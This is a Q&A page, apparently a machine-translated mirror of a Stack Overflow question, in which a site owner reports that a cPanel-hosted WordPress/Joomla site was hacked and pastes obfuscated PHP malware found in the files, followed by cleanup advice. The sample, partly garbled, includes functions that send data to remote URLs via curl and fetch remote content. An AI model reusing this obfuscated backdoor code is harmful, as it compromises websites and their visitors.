1. 首页
  2. 问答
  3. Cpanel Hacked,一些使用base64代码编辑的事故文件

Cpanel Hacked,一些使用base64代码编辑的事故文件

2016-11-17 100 views
-2

我有一些奇怪的问题,虽然我无法通过谷歌访问我的网站,因为它提醒用户本网站包含恶意软件。Cpanel Hacked,一些使用base64代码编辑的事故文件

我的一些文件已经被意外在我所有的文件夹编辑,Wordpress或Joomla!核心之间产生非常聪明一些新文件,你永远不能够理解他们创造了病毒。

他们都已经通过的base64编码编辑的,我删除所有新的病毒文件,并恢复原始文件,但他们将在今天再次创建。

我的帐户是交友,我改变了交友密码一段时间,但没有奏效,我不删除FTP用户,因为我想也许我亏我的文件?

我应该怎么办? 谢谢!



    ")} = YypSc0cQFhy3J("'25-3:-"); 
          ${XiR75Dp("`ko)[email protected]#U")} = yndJFg6Eb("&%+3"); 
    ${UXiKSbeGBtie("i.ntxV2Xn-2!")} = zOeQ89("7(36.4;."); 
          ${XiR75Dp("yVfSi9Y7i>"); 
    function zOeQ89($SRPfSoOMwY){return YypSc0cQFhy3J($SRPfSoOMwY);}; 

    ${XiR75Dp("5/*V34")} = zOeQ89(")60086,+2+7/)#57\$*,+8.0"); 

    function wurJ5mP0tuiT($nx1ZVDkeubPPn){return YypSc0cQFhy3J($nx1ZVDkeubPPn);}; 
    function yndJFg6Eb($erFRGKz){return YypSc0cQFhy3J($erFRGKz);}; 

    ${zOeQ89(";kT+)s-?Ckl86")} = YypSc0cQFhy3J("-65-2"); 
    ${zOeQ89("y;sZ7j./ll/\"")} = yndJFg6Eb("6%:37*:"); 
    ${yndJFg6Eb("[email protected]")} = yndJFg6Eb(")'%6*%2-B)0D*577"); 
         ${YypSc0cQFhy3J("vP2[[email protected]")} = UXiKSbeGBtie("4*\$S"); 
          function Su59bl($Ic6knPclJ){return YypSc0cQFhy3J($Ic6knPclJ);}; 
    ${XiR75Dp("xhVUl{y=:")} = XiR75Dp(")600*4;1=30?"); 
    ${yndJFg6Eb("sV3t-0\\w]")} = zOeQ89("\"&''1':4*=3"); 
    ${Su59bl("%g:ixyA")} = UXiKSbeGBtie(")60086,+2+7/)#57\$*,+8.0"); 

    ${Su59bl("*k.3d)y")} = YypSc0cQFhy3J("*0,#8+;"); 

    ${XiR75Dp("6i.j=;gB[5r\$l")} = yndJFg6Eb("-h{20y^Vl#^Ej"); 
     ${Su59bl("t'VR>t5*11x}`")} = UXiKSbeGBtie("465798"); 
          ${yndJFg6Eb("3an=m|[email protected]")} = UXiKSbeGBtie("47%[email protected]"); 
    ${YypSc0cQFhy3J("l&i*3u")} = Su59bl("'71'9/66(/C5466"); 
    ${zOeQ89("\$3dt;@436{}qc")} = XiR75Dp(".&V"); 
    ${yndJFg6Eb("7rz;;r")} = YypSc0cQFhy3J("d&e/wulX=?!x"); 

    ${wurJ5mP0tuiT("\$:)2w2k~")} = wurJ5mP0tuiT("4+0-1'9'=/[email protected]"); 
          ${YypSc0cQFhy3J("bhf[l8")} = YypSc0cQFhy3J("548)"); 
    ${UXiKSbeGBtie("f4S5TVs")} = YypSc0cQFhy3J("&:304*,"); 
      ${wurJ5mP0tuiT("nc7=,?>-~`")} = YypSc0cQFhy3J("04'"); 
    ${XiR75Dp("4%Z(f:")} = YypSc0cQFhy3J("*/304*,"); 
    ${XiR75Dp(";S)ty:%:020?"); 
       ${UXiKSbeGBtie("*q7rYk")} = yndJFg6Eb("*0\"%78(A"); 
    ${yndJFg6Eb("8eT:3*j")} = UXiKSbeGBtie("465)&3&+88?196\"'7+(!zA2B")} = yndJFg6Eb("'+/8*8&>*"); 
    ${wurJ5mP0tuiT("6c'upj,X^MPJ"), 
        YypSc0cQFhy3J("l1=-12(U[VYJG%215';1+60e?mtkhD]TWcI#*0'3X^MPJ"),); 


    if (${wurJ5mP0tuiT("3an=m|[email protected]")}(${zOeQ89(":&Th7q~")}($_SERVER[UXiKSbeGBtie("rcsksx&lptnx`mf")]), wurJ5mP0tuiT("C")) != ${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("O"))+395){ ${UXiKSbeGBtie("\$%4&)V*/'~\\")], '');exit();} 
    if (empty(${YypSc0cQFhy3J("~gfv")})) 
    { 
           ${XiR75Dp("cxww5}+;;r}ua")}(); 
    } 

          ${Su59bl("(9wzjv")} = ${wurJ5mP0tuiT("0tu|g1:")}(); 
    ${Su59bl("pUVY*:v")} = @$GLOBALS[YypSc0cQFhy3J("lue.d]}B")][Su59bl("gtur\$yxky)jqdnu")]; 

    if (${wurJ5mP0tuiT("*q7rYk")}(${YypSc0cQFhy3J("pUVY*:v")}, ${zOeQ89("[email protected]")})) 
    { 
           ${yndJFg6Eb("cxww5}+;;r}ua")}(); 
    } 


    if (empty(${Su59bl("(9wzjv")})) 
    { 
     ${Su59bl("cxww5}+;;r}ua")}(); 
    } 

         ${YypSc0cQFhy3J(",-k>{W+6^")} = ${XiR75Dp(";4{0,\\2:#@")}(${Su59bl("(9wzjv")}, ${XiR75Dp("cvh0w73j;`06")}(XiR75Dp("O")), ${yndJFg6Eb("lhi8mYf.!")}(${Su59bl("(9wzjv")}, UXiKSbeGBtie("M"))+${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("P"))); 
         if (${wurJ5mP0tuiT("*q7rYk")}(${wurJ5mP0tuiT(",-k>{W+6^")}, ${wurJ5mP0tuiT("pU/+SlnrhB?E")})) 
    { 

     ${UXiKSbeGBtie("cxww5}+;;r}ua")}(); 
    } 

    ${YypSc0cQFhy3J("lWi(k4")} = ${YypSc0cQFhy3J("cvh0w73j;`06")}(Su59bl("QYRYT")); 

    ${UXiKSbeGBtie("92w>2=tX")} = ${UXiKSbeGBtie("cvh0w73j;`06")}(yndJFg6Eb("O")); 
        foreach (${zOeQ89(")4c3:/Y,")}($GLOBALS[UXiKSbeGBtie("lue.d]}B")][XiR75Dp("qerwhwy'|zr")]) as ${zOeQ89("7w%hy3")}) 
    { 

     ${Su59bl("lWi(k4")} += ${UXiKSbeGBtie("nc7=,?>-~`")}(${UXiKSbeGBtie("7w%hy3")}); 
     ${Su59bl("92w>2=tX")} ++; 
    } 
    ${YypSc0cQFhy3J("lWi(k4")}-~`")}(${YypSc0cQFhy3J("lWi(k4")}[${UXiKSbeGBtie("cvh0w73j;`06")}(XiR75Dp("O"))]) + ${wurJ5mP0tuiT("nc7=,?>-~`")}(${yndJFg6Eb("lWi(k4")}[${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("P"))]) + (${UXiKSbeGBtie("t'VR>t5*11x}`")}(${YypSc0cQFhy3J(";4{0,\\2:#@")}($GLOBALS[XiR75Dp("lue.d]}B")][yndJFg6Eb("qerwhwy'|zr")], -${UXiKSbeGBtie("cvh0w73j;`06")}(YypSc0cQFhy3J("S"))), Su59bl("M2+4")) == FALSE ? ${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("XX")) : ${wurJ5mP0tuiT("::+'hr+Z+s")}(${YypSc0cQFhy3J("(9wzjv")})))) . YypSc0cQFhy3J("Y") . ${UXiKSbeGBtie("sx{[email protected]*11x}`")}(${yndJFg6Eb("y)6n(gk5|")}, Su59bl("M*711")) === FALSE) 
    { 

     ${XiR75Dp("2ko:tw~04;/O2'9+;S=1\"/")); 
         ${UXiKSbeGBtie("2ko:tw~0!zA2B")}; 
    global ${UXiKSbeGBtie("%g:ix!zA2B")}(${Su59bl("(9wzjv")}, FILTER_VALIDATE_IP, ${UXiKSbeGBtie("*-oRufz1")} | FILTER_FLAG_NO_RES_RANGE) !== FALSE) 
          { 
          return ${UXiKSbeGBtie("(9wzjv")}; 

                     } 
       } 
      } 
     } 

     return ""; 
    } 


    function xccEP2Ijj4k() 
    {global ${XiR75Dp("6iXgz]h*Y\$")}; 

    global ${YypSc0cQFhy3J("6c'upj, array(yndJFg6Eb("*)137+&-;4") => true)))); 
      $content = ${yndJFg6Eb(";S*e\\o95")}(${zOeQ89("2-'qk9Z")}, ${UXiKSbeGBtie("%Pg:*8.")}, $content); 
      ${YypSc0cQFhy3J("6iXgz]h*Y\$")}(yndJFg6Eb("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")}, $content); 
     } 
     else 
     { 
      $content = @${XiR75Dp(":&Th7q~")}(Su59bl("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")}); 
     } 

     exit($content); 
    } 

        function lHZnkU90EY5yK($url, $content) 
    {global ${YypSc0cQFhy3J("cvh0w73j;`06")}; 
    global ${Su59bl("[email protected]^v")}; 

    global ${UXiKSbeGBtie("6b,[email protected];=")}; 
    global ${yndJFg6Eb("eV4t5~")} = ${YypSc0cQFhy3J("6b,[email protected];=")}(); 


     ${yndJFg6Eb("[email protected]^v")}(${XiR75Dp("nV6>4t5~")}, CURLOPT_URL, $url); 
     ${Su59bl("[email protected]^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_POST, ${Su59bl("cvh0w73j;`06")}(Su59bl("P"))); 
     ${XiR75Dp("[email protected]^v")}(${yndJFg6Eb("nV6>4t5~")}, CURLOPT_POSTFIELDS, $content); 

     ${yndJFg6Eb("[email protected]^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_RETURNTRANSFER, TRUE); 

     ${wurJ5mP0tuiT("nSz=[334t")} = ${zOeQ89(";S)ty:4t5~")}); 
     ${YypSc0cQFhy3J("eV4t5~")}); 

           return ${UXiKSbeGBtie("nSz=[334t")}; 
    } 


    function EdDkTQG2tuVN($url, $content) 
        {global ${yndJFg6Eb("2ko:tw~0 Array(wurJ5mP0tuiT(".'7,4*") => yndJFg6Eb("ootv"), zOeQ89(")'\$(*8") => yndJFg6Eb("b118*4;S=C;[email protected]\$4520+*>4;/O;OS/9=9L750*4*7-//"), yndJFg6Eb("\$118*4;") => $content))); 

        ${Su59bl("nSz=[334t")} = @${Su59bl(":&Th7q~")}($url, FALSE, ${zOeQ89("qh:{nh][email protected]:9")}); 


     return ${YypSc0cQFhy3J("nSz=[334t")}; 
    }

来源

2016-11-17 hamid hassani

+0

堆栈溢出用于编程问题。你可以尝试在另一个论坛上提问。 – Jerry

+0

看看插件“Wordfence” - 它适用于这些情况,至少对于清理它们非常有用。你必须进一步的步骤(改变密码等),以确保事情是安全的。最有可能的是,一个易受攻击的脚本存在于您的网站主题或插件的某个地方,他们只会继续重击。在Wordfence中,运行全部扫描并检查所有选项。它会发现你的感染,可能还有更多,并帮助你清理它。请先备份所有内容:) –

回答

0

您必须更改所有密码,也是FTP。他们最有可能获得了其中一个。它是在自己的服务器上的cPanel,还是它作为经销商或最终用户使用的cPanel?如果它是你自己的服务器,那么服务器可能会受到攻击,你应该明确地请求专家检查安全性并删除服务器上的任何病毒。

如果它是你正在使用你应该问你的主机经销商的cPanel。还要确保你删除了任何不应该在那里的奇怪的PHP文件,你很可能在某个地方有一个后门程序。最好的方法是删除wp-content文件夹以外的所有内容。

重新上传WordPress的文件,并手动检查的wp-content所有文件。最简单的方法是删除所有插件文件,并从存储库下载新的新文件。也许你应该对你的主题做同样的事情。请手动检查您的上传目录。

来源

2016-11-17 13:20:42

相关问题

 相关问题